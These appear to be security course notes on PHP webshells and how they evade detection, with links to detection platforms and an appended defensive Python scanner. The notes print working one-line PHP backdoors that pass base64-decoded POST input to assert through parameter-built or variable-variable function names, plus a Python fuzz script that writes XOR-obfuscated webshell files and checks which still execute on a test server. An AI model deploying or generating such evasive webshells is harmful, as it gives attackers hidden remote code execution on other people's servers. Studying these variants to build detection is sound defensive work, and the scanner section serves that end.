Webshell detection platforms
https://scanner.baidu.com/#/pages/intro
https://ti.aliyun.com/#/webshell
Basics - how script backdoors (webshells) are controlled - code explained
Tool comparison by code - 菜刀 (China Chopper), 蚁剑 (AntSword), 冰蝎 (Behinder), 哥斯拉 (Godzilla), etc.
Principle - how script backdoors are detected and removed - function matching & behaviour analysis
Comparison with WAF rules - function-name matching, tool fingerprints, etc.
Code - script backdoor evasion variants - variable overwrite & parameter passing
1.php: function name passed in through a request parameter
<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>
?a=ass
x=cGhwaW5mbygpOw==
2.php: variable overwrite (variable variable)
<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>
x=cGhwaW5mbygpOw==
Code - script backdoor evasion variants - XOR & encryption
3.php: encryption variant
4.php: XOR operation (the fuzz script below generates the 4.php variants and checks which ones the local test server still executes)
import requests
import time
import threading, queue


def string():
    # worker: take one generated file name from the queue and check whether
    # the local test server executes it (the hostname shows up in phpinfo output)
    while not q.empty():
        filename = q.get()
        url = 'http://127.0.0.1:8081/x/' + filename
        datas = {'x': 'phpinfo();'}
        result = requests.post(url, data=datas).content.decode('utf-8')
        if 'XIAODI-PC' in result:
            print('check->' + filename + '->ok')
        else:
            print('check->' + filename + '->no')
        time.sleep(1)


def shell_test_check():
    # single-file check used while developing the script
    url = 'http://127.0.0.1:8081/x/33xd64.php'
    datas = {'x': 'phpinfo();'}
    result = requests.post(url, data=datas).content.decode('utf-8')
    print(result)
    if 'XIAODI-PC' in result:
        print('ok')


if __name__ == '__main__':
    q = queue.Queue()
    # write one file per pair of characters: the callee name is ('X'^'Y').'ssert'
    for i in range(1, 127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            with open('D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a') as f:
                f.write(code)
    print('Fuzz文件生成成功')
    # 20 worker threads drain the queue and report which files still execute
    for x in range(20):
        t = threading.Thread(target=string)
        t.start()
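As an added example that is not part of this course's materials, the small Python scanner below contrasts the WAF-style function-name match with a behaviour rule, run over this page's 1.php and 2.php, the XOR form the fuzz script writes, and a constructed benign ok.php. The rule names, the taint heuristic and the benign sample are assumptions made for illustration, not any product's detection logic.

```python
import re

# Constructed samples: the two variants shown on this page, the XOR template the
# fuzz script writes out, and a benign file to check for false positives.
SAMPLES = {
    "1.php": "<?php $a=$_GET['a']; $aa=$a.'ert'; $aa(base64_decode($_POST['x'])); ?>",
    "2.php": "<?php $a='b'; $b='assert'; $$a(base64_decode($_POST['x'])); ?>",
    "4.php": "<?php $a=('!'^'@').'ssert';$a($_POST[x]);?>",
    "ok.php": "<?php $title='Hi'; echo htmlspecialchars($_GET['q'] ?? $title); ?>",
}

DANGEROUS = re.compile(r"\b(assert|eval|system|passthru|shell_exec)\s*\(")
ASSIGN = re.compile(r"\$(\w+)\s*=\s*([^;]+);")                # $name = <rhs>;
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
VAR_CALL = re.compile(r"(\$\$?)(\w+)\s*\(")                   # $name(...) / $$name(...)
DECODED = re.compile(r"(?:base64_decode|str_rot13|gzinflate)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")

def name_match(source):
    """The naive WAF-style rule: a literal dangerous function name followed by '('."""
    return bool(DANGEROUS.search(source))

def behaviour_match(source):
    """Flag callees whose name is computed at run time (request input, string
    concatenation, XOR, or a variable variable) instead of matching a name."""
    findings, tainted = [], set()
    for var, rhs in ASSIGN.findall(source):
        refs = set(re.findall(r"\$(\w+)", rhs))
        if SUPERGLOBAL.search(rhs) or "." in rhs or "^" in rhs or refs & tainted:
            tainted.add(var)            # value is not a plain literal (heuristic)
    for sigil, var in VAR_CALL.findall(source):
        if sigil == "$$":
            findings.append(f"variable-variable call $${var}()")
        elif var in tainted:
            findings.append(f"computed callee ${var}()")
    if DECODED.search(source):
        findings.append("request input decoded before use")
    return findings

def scan_all(samples=SAMPLES):
    """Run both rules over every sample; only the behaviour rule catches the variants."""
    return {name: (name_match(src), behaviour_match(src)) for name, src in samples.items()}

if __name__ == "__main__":
    for name, (by_name, by_behaviour) in scan_all().items():
        print(f"{name}: name match={by_name}, behaviour={by_behaviour}")
```

None of the three variants contains a literal `assert(`, so the name rule misses all of them while the behaviour rule flags each one and leaves ok.php clean; the encrypted 3.php variant shows why source heuristics like these need to be paired with runtime monitoring of which functions actually execute.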
Extension - other script backdoor types - JSP & ASPX
5.php: script generator
Webshell-venom
ASP PHP JSP ASPX